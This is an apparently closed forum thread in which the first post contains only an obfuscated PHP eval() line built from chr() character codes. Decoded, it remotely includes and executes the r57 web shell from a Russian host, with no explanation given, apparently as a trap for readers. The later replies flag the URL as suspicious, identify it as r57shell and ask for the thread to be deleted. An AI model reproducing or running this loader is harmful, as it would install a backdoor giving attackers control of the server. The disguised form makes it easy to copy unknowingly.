Sign in to follow this  
Followers 0
des123

Font

3 posts in this topic

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Share this post


Link to post
Share on other sites



Somebody just delete this thread. While the code in Eval() isn't malicious, it's a URL that might be.

Share this post


Link to post
Share on other sites

Somebody just delete this thread. While the code in Eval() isn't malicious, it's a URL that might be.

Definitely.

If you Google for "r57shell.php" you will find lots of links to stuff

about security and hacking. One of them is this link to Symantec.

Makes me wonder why this is posted in the v2 forums, when the code

is obviously PHP ! Anyone who's smart enough to figure that it's PHP,

would also be smart enough to not try it out without checking it out first !

Nice try (not really) moron !

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.
Sign in to follow this  
Followers 0